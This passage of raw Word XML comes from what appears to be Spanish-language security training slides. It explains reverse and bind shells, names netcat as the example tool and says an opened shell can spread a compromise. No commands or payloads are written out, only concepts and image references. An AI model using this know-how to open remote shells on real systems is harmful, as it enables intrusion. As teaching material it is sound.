        <w:t xml:space="preserve">Tomaremos el ejemplo de la herramienta de navaja suiza (también </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>conocida</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>como</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CE35EC7" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:sectPr w:rsidR="001B199E" w:rsidRPr="007A7B84">
          <w:pgSz w:w="19200" w:h="10800" w:orient="landscape"/>
          <w:pgMar w:top="1120" w:right="0" w:bottom="580" w:left="0" w:header="0" w:footer="293" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29B7D25C" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:spacing w:line="968" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Descripción general de la carcasa inversa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C0DD3A4" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="097CE13F" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16D9D6E0" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E151090" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49293F33" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E6A6E07" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="76"/>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7604224" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0D563BC3" wp14:editId="403F66DB">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>873189</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>218966</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="10625455" cy="3065145"/>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5455" cy="3065145"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="10625455" cy="3065145"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="95" name="Image 95"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId37" cstate="print"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="10625452" cy="3064941"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="96" name="Image 96"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId38" cstate="print"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="158558" y="158584"/>
                            <a:ext cx="10128504" cy="2567940"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </wpg:wgp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:group w14:anchorId="4D40D6F5" id="Group 94" o:spid="_x0000_s1026" style="position:absolute;margin-left:68.75pt;margin-top:17.25pt;width:836.65pt;height:241.35pt;z-index:-15712256;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page" coordsize="106254,30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yP48/c0z6tRR8efuaZ9&#10;WooA9cooooAKKKKACiiigAooooAbsXOdoz64p1FFABRRRQAUUUUAFFFFABRRRQA3Yuc7Rn1xTq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P48/&#10;c0z6tRR8efuaZ9WooA9c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">
                <v:shape id="Image 95" o:spid="_x0000_s1027" type="#_x0000_t75" style="position:absolute;width:106254;height:3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">
                  <v:imagedata r:id="rId39" o:title=""/>
                </v:shape>
                <v:shape id="Image 96" o:spid="_x0000_s1028" type="#_x0000_t75" style="position:absolute;left:1585;top:1585;width:101285;height:2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">
                  <v:imagedata r:id="rId40" o:title=""/>
                </v:shape>
                <w10:wrap type="topAndBottom" anchorx="page"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="640BEEF6" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:spacing w:before="204"/>
        <w:ind w:left="6184"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Figura: </w:t>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>La conexión se realiza desde la máquina víctima</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38DB4D34" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:sectPr w:rsidR="001B199E" w:rsidRPr="007A7B84">
          <w:pgSz w:w="19200" w:h="10800" w:orient="landscape"/>
          <w:pgMar w:top="980" w:right="0" w:bottom="580" w:left="0" w:header="0" w:footer="293" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="502D84B4" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Enlazar conchas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D48CBCC" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1824"/>
        </w:tabs>
        <w:spacing w:before="772"/>
        <w:ind w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Aquí, la máquina atacante se conecta al sistema víctima.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CBF4C37" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="244"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01DBC49C" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1824"/>
        </w:tabs>
        <w:ind w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>El atacante abre un puerto TCP en la máquina víctima y aloja un shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67123411" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="302"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40644E23" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1822"/>
          <w:tab w:val="left" w:pos="1824"/>
        </w:tabs>
        <w:spacing w:line="213" w:lineRule="auto"/>
        <w:ind w:right="3191"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Eso significa que cualquier persona que se conecte a la máquina de destino y en un puerto específico se le presentará un shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63167D03" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="254"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70C6D64C" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1824"/>
        </w:tabs>
        <w:ind w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>A continuación, el shell se puede utilizar para difundir el compromiso.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17180544" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:sectPr w:rsidR="001B199E" w:rsidRPr="007A7B84">
          <w:pgSz w:w="19200" w:h="10800" w:orient="landscape"/>
          <w:pgMar w:top="1120" w:right="0" w:bottom="580" w:left="0" w:header="0" w:footer="293" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F8ECBA9" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Información general sobre el shell de enlace</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7427D095" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3679DB31" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BDAB266" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FFAFDD3" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2AE84A6A" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C7B9847" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="18"/>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7604736" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5B59B02E" wp14:editId="1AC8BFA3">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>873189</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>181824</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="10625455" cy="307086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5455" cy="3070860"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="10625455" cy="3070860"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="98" name="Image 98"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId41" cstate="print"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="10625452" cy="3070771"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="99" name="Image 99"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId42" cstate="print"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="158558" y="158515"/>
                            <a:ext cx="10128504" cy="2574035"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </wpg:wgp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:group w14:anchorId="20C32CC6" id="Group 97" o:spid="_x0000_s1026" style="position:absolute;margin-left:68.75pt;margin-top:14.3pt;width:836.65pt;height:241.8pt;z-index:-15711744;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page" coordsize="106254,30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">
                <v:shape id="Image 98" o:spid="_x0000_s1027" type="#_x0000_t75" style="position:absolute;width:106254;height:3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">
                  <v:imagedata r:id="rId43" o:title=""/>
                </v:shape>
                <v:shape id="Image 99" o:spid="_x0000_s1028" type="#_x0000_t75" style="position:absolute;left:1585;top:1585;width:101285;height:2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">
                  <v:imagedata r:id="rId44" o:title=""/>
                </v:shape>
                <w10:wrap type="topAndBottom" anchorx="page"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C8DB87B" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:spacing w:before="436"/>
        <w:ind w:left="1123" w:right="832"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Figura: </w:t>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>La conexión se realiza desde el equipo atacante</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03EB149D" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:sectPr w:rsidR="001B199E" w:rsidRPr="007A7B84">
          <w:pgSz w:w="19200" w:h="10800" w:orient="landscape"/>
          <w:pgMar w:top="1120" w:right="0" w:bottom="580" w:left="0" w:header="0" w:footer="293" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C827AE9" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4198"/>
        </w:tabs>
        <w:spacing w:line="980" w:lineRule="exact"/>
        <w:ind w:left="4198" w:hanging="1525"/>
        <w:jc w:val="left"/>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31968" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="226C8B69" wp14:editId="392D01A7">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>0</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>0</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="12192000" cy="685800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8000"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="101" name="Graphic 101"/>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45" cstate="print"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="1124711" y="1091234"/>
                            <a:ext cx="10122408" cy="5766765"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="103" name="Image 103"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId46" cstate="print"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="1319783" y="1286255"/>
                            <a:ext cx="9552432" cy="5465061"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </wpg:wgp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:group w14:anchorId="0C755887" id="Group 100" o:spid="_x0000_s1026" style="position:absolute;margin-left:0;margin-top:0;width:960pt;height:540pt;z-index:-17984512;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:page" coordsize="121920,68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6KKK+oP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QUUUUA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&#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">
                <v:shape id="Graphic 101" o:spid="_x0000_s1027"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" path="m12192000,l,,,1193291r12192000,l12192000,xe" fillcolor="#b34512" stroked="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Image 102" o:spid="_x0000_s1028" type="#_x0000_t75" style="position:absolute;left:11247;top:10912;width:101224;height:5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">
                  <v:imagedata r:id="rId47" o:title=""/>
                </v:shape>
                <v:shape id="Image 103" o:spid="_x0000_s1029" type="#_x0000_t75" style="position:absolute;left:13197;top:12862;width:95525;height:5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">
                  <v:imagedata r:id="rId48" o:title=""/>
                </v:shape>
                <w10:wrap anchorx="page" anchory="page"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Descripción general del entorno empresarial</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64B23F78" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2539BE21" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="333FC22B" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3008BEB8" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
